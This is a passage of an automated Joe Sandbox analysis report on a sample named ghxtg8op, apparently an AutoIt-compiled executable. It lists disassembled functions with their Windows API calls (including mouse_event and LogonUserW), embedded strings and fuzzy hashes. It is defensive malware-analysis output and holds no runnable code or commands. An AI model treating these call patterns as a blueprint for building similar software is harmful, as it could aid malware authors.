                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3b9b57c9666998094d28bc7ada2979c2828d87a50b613e8cb564f4935b02965d
                            • Instruction ID: 46950106a68e3bbb2982c29390524f235b40dd36f9709ccbbf9b731604ec66b8
                            • Opcode Fuzzy Hash: 3b9b57c9666998094d28bc7ada2979c2828d87a50b613e8cb564f4935b02965d
                            • Instruction Fuzzy Hash: B0B1E220D2AF414DD72396398831336B75CAFBB2D5F52D71BFC6AB4E22EB2185834151
                            Function 00DA4C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                            Download Yara Rule
                            APIs
                            • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00DA4C76
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: mouse_event
                            • String ID:
                            • API String ID: 2434400541-0
                            • Opcode ID: 8778ec7e5e48d524938d2371247421bfecd2ef5a9134f16342239f4a2f94af45
                            • Instruction ID: d99a24755a165e45bdb14d780e219d075b8aa976dd712756d9ee1fd9b400370d
                            • Opcode Fuzzy Hash: 8778ec7e5e48d524938d2371247421bfecd2ef5a9134f16342239f4a2f94af45
                            • Instruction Fuzzy Hash: 54D05EA012220978EC6807208D4BFBAA109E3C27B1F98A14A7289C51C0E8E09801A034
                            Function 00D987B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                            Download Yara Rule
                            APIs
                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00D98389), ref: 00D987D1
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: LogonUser
                            • String ID:
                            • API String ID: 1244722697-0
                            • Opcode ID: 722259240180c8f436a9edb6d8c16e1645cc2d476fd6190bacec8eacfcd9e3b5
                            • Instruction ID: f49b1ec90247dbb959a382912a5dbba3ad30151e10d5a86c494e68a38186654b
                            • Opcode Fuzzy Hash: 722259240180c8f436a9edb6d8c16e1645cc2d476fd6190bacec8eacfcd9e3b5
                            • Instruction Fuzzy Hash: E1D09E3226460EABEF019FA4DD05EEE3B6AEB04B01F408511FE15D51A1C775D935AB60
                            Function 00D6A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                            Download Yara Rule
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32 ref: 00D6A12A
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: ce3273ea63ce8096ea190a9956d12437ab05fe822a4658ec9a80be928e50918d
                            • Instruction ID: 5fab3f07f529ed7e50d760a3439acec3ef97946ff1932ad995580ec7094276d2
                            • Opcode Fuzzy Hash: ce3273ea63ce8096ea190a9956d12437ab05fe822a4658ec9a80be928e50918d
                            • Instruction Fuzzy Hash: E4A0123000020EB78A001B41EC048847F5DD6401907004020F40C80121873255114590
                            Function 00D58808 Relevance: .6, Instructions: 590COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 52847b89eba096502155f3bf45d41e44164a1778acfbf80633943fb99d890c9c
                            • Instruction ID: 56394ad275ed4b6d074c7d4ade7c3735c23db2d102574d7c18e697e394bee0d3
                            • Opcode Fuzzy Hash: 52847b89eba096502155f3bf45d41e44164a1778acfbf80633943fb99d890c9c
                            • Instruction Fuzzy Hash: 5B224530604606CBDF2A8B24D49477C77A1FB01346F2C807ADD96AB59ADB30DD89EB71
                            Function 00D621C5 Relevance: .3, Instructions: 345COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                            • Instruction ID: b7ce6156de22779d9996842d0a9694713f5307f360e994ccaa548b9a059b0f12
                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                            • Instruction Fuzzy Hash: 8FC181362095930BDF6D463A847403EFAA15EA27B131E076DD8F3CB1D4EE24D965EA30
                            Function 00D625FA Relevance: .3, Instructions: 341COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                            • Instruction ID: 9f177d32296d99122c62ae0df140f6fd8f2d83b0869396fd4615aa3ed02a579c
                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                            • Instruction Fuzzy Hash: CDC171362055930BDF6D463AC83453EBBA15EA27B131E076DD4F2DB1D5EE20C925EA30
                            Function 00D61978 Relevance: .3, Instructions: 323COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                            • Instruction ID: 36cab6f04b09db16ac0cea461bfd09b6429a1042bb8460f19705729b7d8718d5
                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                            • Instruction Fuzzy Hash: 13C16E3A2091930BDF6D463AC47413EFAA15EA27B231E176DD4B3CB1D4EE20C965DA70
                            Function 00995108 Relevance: .1, Instructions: 92COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.486369482.0000000000991000.00000040.00000020.00020000.00000000.sdmp, Offset: 00991000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_991000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                            • Instruction ID: 033c2eac7ef82f7c9c8e3f20c8299b7eccc27741c91c1f5114df7a397519b45f
                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                            • Instruction Fuzzy Hash: 9C41D571D1051CDBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB40
                            Function 00DB7806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                            Download Yara Rule
                            APIs
                            • DeleteObject.GDI32(00000000), ref: 00DB785B
                            • DeleteObject.GDI32(00000000), ref: 00DB786D
                            • DestroyWindow.USER32 ref: 00DB787B
                            • GetDesktopWindow.USER32 ref: 00DB7895
                            • GetWindowRect.USER32(00000000), ref: 00DB789C
                            • SetRect.USER32 ref: 00DB79DD
                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00DB79ED
                            • CreateWindowExW.USER32 ref: 00DB7A35
                            • GetClientRect.USER32(00000000,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB7A41
                            • CreateWindowExW.USER32 ref: 00DB7A7B
                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00DB7A9D
                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB7AB0
                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DB7ABB
                            • GlobalLock.KERNEL32(00000000), ref: 00DB7AC4
                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000), ref: 00DB7AD3
                            • GlobalUnlock.KERNEL32(00000000), ref: 00DB7ADC
                            • CloseHandle.KERNEL32(00000000), ref: 00DB7AE3
                            • GlobalFree.KERNEL32(00000000), ref: 00DB7AEE
                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000), ref: 00DB7B00
                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00DD2CAC,00000000), ref: 00DB7B16
                            • GlobalFree.KERNEL32(00000000), ref: 00DB7B26
                            • CopyImage.USER32 ref: 00DB7B4C
                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00DB7B6B
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020), ref: 00DB7B8D
                            • ShowWindow.USER32(00000004), ref: 00DB7D7A
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                            • String ID: $AutoIt v3$DISPLAY$static
                            • API String ID: 2211948467-2373415609
                            • Opcode ID: ea3ab31e4052e393d1050288cf4863c789f10b102cab4f81ba50b88624f16214
                            • Instruction ID: 59aadca759f24d2a01e6381c1e063443172a7daa11373ba5620381f54bec9af6
                            • Opcode Fuzzy Hash: ea3ab31e4052e393d1050288cf4863c789f10b102cab4f81ba50b88624f16214
                            • Instruction Fuzzy Hash: 9D022871900216EFDB14DFA9DC89EAEBBB9EB48310F148158F916EB2A1C7319D41CB70
                            Function 00DC356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                            Download Yara Rule
                            APIs
                            • CharUpperBuffW.USER32(?,?), ref: 00DC3627
                            • IsWindowVisible.USER32(?), ref: 00DC364B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: BuffCharUpperVisibleWindow
                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                            • API String ID: 4105515805-45149045
                            • Opcode ID: a5a80f1e95c05b93ac6d6c424453a8d195beffeaefd858ab111e1c01d4adab6e
                            • Instruction ID: d36fafd9fd0b14424d517847f8b6e7c1c476e141202478e213045acdb945dc18
                            • Opcode Fuzzy Hash: a5a80f1e95c05b93ac6d6c424453a8d195beffeaefd858ab111e1c01d4adab6e
                            • Instruction Fuzzy Hash: DAD15E302043029BCB04EF14C465F6EBBA1EF95394F15845CF9869B3A2DB31EA0ADB71
                            Function 00DCA5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                            Download Yara Rule
                            APIs
                            • SetTextColor.GDI32(?,00000000), ref: 00DCA630
                            • GetSysColorBrush.USER32 ref: 00DCA661
                            • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,?,?,?,?,?,00D7B93A,?,?), ref: 00DCA66D
                            • SetBkColor.GDI32(?,000000FF), ref: 00DCA687
                            • SelectObject.GDI32(?,00000000), ref: 00DCA696
                            • InflateRect.USER32 ref: 00DCA6C1
                            • GetSysColor.USER32(00000010,?,?,?,?,?,?,?,?,?,?,?,?,00D7B93A,?,?), ref: 00DCA6C9
                            • CreateSolidBrush.GDI32(00000000), ref: 00DCA6D0
                            • FrameRect.USER32 ref: 00DCA6DF
                            • DeleteObject.GDI32(00000000), ref: 00DCA6E6
                            • InflateRect.USER32 ref: 00DCA731
                            • FillRect.USER32 ref: 00DCA763
                            • GetWindowLongW.USER32(?,000000F0), ref: 00DCA78E
                              • Part of subcall function 00DCA8CA: GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,00DCA5FA,?,?,00000000,?), ref: 00DCA903
                              • Part of subcall function 00DCA8CA: SetTextColor.GDI32(?,?), ref: 00DCA907
                              • Part of subcall function 00DCA8CA: GetSysColorBrush.USER32 ref: 00DCA91D
                              • Part of subcall function 00DCA8CA: GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,00DCA5FA,?,?,00000000,?,?), ref: 00DCA928
                              • Part of subcall function 00DCA8CA: GetSysColor.USER32(00000011,?,?,?,?,?,?,?,00DCA5FA,?,?,00000000,?,?), ref: 00DCA945
                              • Part of subcall function 00DCA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00DCA953
                              • Part of subcall function 00DCA8CA: SelectObject.GDI32(?,00000000), ref: 00DCA964
                              • Part of subcall function 00DCA8CA: SetBkColor.GDI32(?,00000000), ref: 00DCA96D
                              • Part of subcall function 00DCA8CA: SelectObject.GDI32(?,?), ref: 00DCA97A
                              • Part of subcall function 00DCA8CA: InflateRect.USER32 ref: 00DCA999
                              • Part of subcall function 00DCA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00DCA9B0
                              • Part of subcall function 00DCA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00DCA9C5
                              • Part of subcall function 00DCA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00DCA9ED
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                            • String ID:
                            • API String ID: 3521893082-0
                            • Opcode ID: ff83ec2e7b545f234852a18dff1c333de98503229e126e35207b03e06457c1c3
                            • Instruction ID: 073c85ec57aa879fa937b17cfc4c44aa3eae88b095dc73d37c8d5bc654e18d2b
                            • Opcode Fuzzy Hash: ff83ec2e7b545f234852a18dff1c333de98503229e126e35207b03e06457c1c3
                            • Instruction Fuzzy Hash: 43915D72008307AFD7119F64DC08E9B7BAAFF88325F144A29F5A2D62E1D771D944CB62
                            Function 00D42C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                            Download Yara Rule
                            APIs
                            • DestroyWindow.USER32 ref: 00D42CA2
                            • DeleteObject.GDI32(00000000), ref: 00D42CE8
                            • DeleteObject.GDI32(00000000), ref: 00D42CF3
                            • DestroyIcon.USER32(00000000,?,?,?), ref: 00D42CFE
                            • DestroyWindow.USER32 ref: 00D42D09
                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00D7C43B
                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00D7C474
                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00D7C89D
                              • Part of subcall function 00D41B41: InvalidateRect.USER32(?,00000000,00000001), ref: 00D41B9A
                            • SendMessageW.USER32(?,00001053), ref: 00D7C8DA
                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00D7C8F1
                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00D7C907
                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00D7C912
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                            • String ID: 0
                            • API String ID: 464785882-4108050209
                            • Opcode ID: 23a8545cf4f8dfa0462a4d7a2c7a67bd36c15c61cd2e2e0a4adf6746e42ceac2
                            • Instruction ID: 7041c0b125559f30ef95ababdc4cc2e84f2f83ccb4831460bd81616e21fd9dd0
                            • Opcode Fuzzy Hash: 23a8545cf4f8dfa0462a4d7a2c7a67bd36c15c61cd2e2e0a4adf6746e42ceac2
                            • Instruction Fuzzy Hash: 58127C30614202AFDB25CF24C884BA9B7E5FF44310F98956DF599CB262DB31E842DBB1
                            Function 00DB74AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                            Download Yara Rule
                            APIs
                            • DestroyWindow.USER32 ref: 00DB74DE
                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00DB759D
                            • SetRect.USER32 ref: 00DB75DB
                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00DB75ED
                            • CreateWindowExW.USER32 ref: 00DB7633
                            • GetClientRect.USER32(00000000,?,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00DB763F
                            • CreateWindowExW.USER32 ref: 00DB7683
                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00DB7692
                            • GetStockObject.GDI32(00000011), ref: 00DB76A2
                            • SelectObject.GDI32(00000000,00000000), ref: 00DB76A6
                            • GetTextFaceW.GDI32(00000000,00000040,?), ref: 00DB76B6
                            • GetDeviceCaps.GDI32(00000000,0000005A,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?), ref: 00DB76BF
                            • DeleteDC.GDI32(00000000), ref: 00DB76C8
                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00DB76F4
                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00DB770B
                            • CreateWindowExW.USER32 ref: 00DB7746
                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00DB775A
                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00DB776B
                            • CreateWindowExW.USER32 ref: 00DB779B
                            • GetStockObject.GDI32(00000011), ref: 00DB77A6
                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00DB77B1
                            • ShowWindow.USER32(00000004), ref: 00DB77BB
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                            • API String ID: 2910397461-517079104
                            • Opcode ID: 656f35e69444ed45a91cc78876fc33ff711731e5a36d5b76e7d5e334150f1c2e
                            • Instruction ID: 051eccf39af3133ba966f82817873ec5b888d650d55fb935ffaacae4b4c583a7
                            • Opcode Fuzzy Hash: 656f35e69444ed45a91cc78876fc33ff711731e5a36d5b76e7d5e334150f1c2e
                            • Instruction Fuzzy Hash: C3A14D71A40606BFEB149BA5DC4AFAF7BBAEB44710F048114FA15E72E0C671AD04CB70
                            Function 00DAAD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 00DAAD1E
                            • GetDriveTypeW.KERNEL32(?,00DCFAC0,?,\\.\,00DCF910), ref: 00DAADFB
                            • SetErrorMode.KERNEL32(00000000,00DCFAC0,?,\\.\,00DCF910), ref: 00DAAF59
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ErrorMode$DriveType
                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                            • API String ID: 2907320926-4222207086
                            • Opcode ID: 5ba12af84faeee2793e0baaa8e4b1dc1d939993c742375538b8bf62d0426707c
                            • Instruction ID: 0aa1050e2e7a9fa3a336ecc25510bb7e6851c22296686ac931a6b4e38b7e8a0a
                            • Opcode Fuzzy Hash: 5ba12af84faeee2793e0baaa8e4b1dc1d939993c742375538b8bf62d0426707c
                            • Instruction Fuzzy Hash: 545180B0644309AF8B14DB18C992CBDB3A1EF4A700B258257F547A7291DB31DE49EB73
